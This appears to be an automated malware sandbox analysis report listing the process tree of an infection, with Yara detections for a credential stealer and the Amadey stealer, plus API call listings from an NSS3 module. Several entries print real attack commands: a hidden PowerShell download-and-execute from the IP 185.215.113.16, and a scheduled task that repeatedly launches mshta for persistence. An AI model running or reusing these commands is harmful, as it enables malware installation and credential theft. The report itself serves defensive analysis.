Imagebase:0x7ff70fe90000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:09:43:31
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:0x7ff6eb350000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                                                                    Start time:09:43:31
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                                                    Start time:09:43:31
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                                                                                                                                                                                                                                    Imagebase:0x7ff70fe90000
                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                                                    Start time:09:43:32
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                                                    Start time:09:43:32
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                                    Start time:09:43:32
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\18EB.tmp\18EC.tmp\18ED.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                                    Start time:09:43:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                                                                    Start time:09:43:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                                                                    Start time:09:43:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:62
Start time:09:43:33
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\1B0E.tmp\1B0F.tmp\1B10.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
Imagebase:0x7ff7ac430000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:09:43:33
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff7ac430000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:09:43:33
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0xe00000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:09:43:34
Start date:31/12/2024
Path:C:\wOXcVegx\jyidkjkfhjawd.exe
Wow64 process (32bit):true
Commandline:"C:\wOXcVegx\jyidkjkfhjawd.exe"
Imagebase:0x880000
File size:1'282'048 bytes
MD5 hash:1B40450E11F71DA7D6F3D9C025C078E0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000041.00000003.2682807652.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000041.00000003.2674898719.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:66
Start time:09:43:36
Start date:31/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff7ac430000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:09:43:36
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Imagebase:0x7ff6eb350000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:09:43:38
Start date:31/12/2024
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta "C:\Temp\.hta"
Imagebase:0x7ff7b3970000
File size:14'848 bytes
MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:09:43:38
Start date:31/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:0x7ff6eb350000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:09:43:38
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff68cce0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:09:43:39
Start date:31/12/2024
Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Imagebase:0xc00000
File size:3'220'480 bytes
MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000048.00000002.2597235360.0000000000C01000.00000040.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:73
                                                                                                                                                                                                                                                    Start time:09:43:39
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:schtasks /delete /tn "AutoRunHTA" /f
                                                                                                                                                                                                                                                    Imagebase:0x7ff70fe90000
                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:74
                                                                                                                                                                                                                                                    Start time:09:43:40
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                                                                                                                                                                                                                                    Imagebase:0x7ff70fe90000
                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:75
                                                                                                                                                                                                                                                    Start time:09:43:43
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                                                    Imagebase:0xc00000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000004B.00000002.2646109112.0000000000C01000.00000040.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:76
                                                                                                                                                                                                                                                    Start time:09:44:09
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe"
                                                                                                                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                                                                                                                    File size:50'265'898 bytes
                                                                                                                                                                                                                                                    MD5 hash:26F7294CA7A10C65B44057525A233636
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 9%, ReversingLabs
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:77
                                                                                                                                                                                                                                                    Start time:09:44:15
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe"
                                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                                    File size:2'013'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 8%, ReversingLabs
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:123
                                                                                                                                                                                                                                                    Start time:09:44:42
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:255
                                                                                                                                                                                                                                                    Start time:09:47:45
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2120,6C487E60), ref: 6C486EBC
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C486EDF
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C486EF3
                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3(000000FF), ref: 6C486F25
                                                                                                                                                                                                                                                        • Part of subcall function 6C45A900: TlsGetValue.KERNEL32(00000000,?,6C5D14E4,?,6C3F4DD9), ref: 6C45A90F
                                                                                                                                                                                                                                                        • Part of subcall function 6C45A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C45A94F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C486F68
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000008), ref: 6C486FA9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4870B4
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4870C8
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D24C0,6C4C7590), ref: 6C487104
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C487117
                                                                                                                                                                                                                                                      • SECOID_Init.NSS3 ref: 6C487128
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000057), ref: 6C48714E
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C48717F
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4871A9
                                                                                                                                                                                                                                                      • PR_NotifyAllCondVar.NSS3 ref: 6C4871CF
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C4871DD
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4871EE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C487208
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487221
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000001), ref: 6C487235
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C48724A
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C48725E
                                                                                                                                                                                                                                                      • PR_NotifyCondVar.NSS3 ref: 6C487273
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C487281
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6C487291
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872B1
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872D4
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872E3
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487301
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487310
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487335
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487344
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487363
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487372
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C5C0148,,defaultModDB,internalKeySlot), ref: 6C4874CC
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487513
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C48751B
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487528
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C48753C
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487550
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487561
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487572
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487583
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C487594
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4875A2
                                                                                                                                                                                                                                                      • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C4875BD
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4875C8
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4875F1
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C487636
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6C487686
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C4876A2
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000050), ref: 6C4876B6
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C487707
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C48771C
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C487731
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C48774A
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C487770
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C487779
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C48779A
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4877AC
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(-0000000D), ref: 6C4877C4
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4877DB
                                                                                                                                                                                                                                                      • strrchr.VCRUNTIME140(?,0000002F), ref: 6C487821
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C487837
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C48785B
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C48786F
                                                                                                                                                                                                                                                      • SECMOD_AddNewModuleEx.NSS3 ref: 6C4878AC
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4878BE
                                                                                                                                                                                                                                                      • SECMOD_AddNewModuleEx.NSS3 ref: 6C4878F3
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4878FC
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C48791C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • Spac, xrefs: 6C487389
                                                                                                                                                                                                                                                      • sql:, xrefs: 6C4876FE
                                                                                                                                                                                                                                                      • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C4874C7
                                                                                                                                                                                                                                                      • extern:, xrefs: 6C48772B
                                                                                                                                                                                                                                                      • dll, xrefs: 6C48788E
                                                                                                                                                                                                                                                      • rdb:, xrefs: 6C487744
                                                                                                                                                                                                                                                      • NSS Internal Module, xrefs: 6C4874A2, 6C4874C6
                                                                                                                                                                                                                                                      • dbm:, xrefs: 6C487716
                                                                                                                                                                                                                                                      • ,defaultModDB,internalKeySlot, xrefs: 6C48748D, 6C4874AA
                                                                                                                                                                                                                                                      • kbi., xrefs: 6C487886
                                                                                                                                                                                                                                                      Memory Dump Source
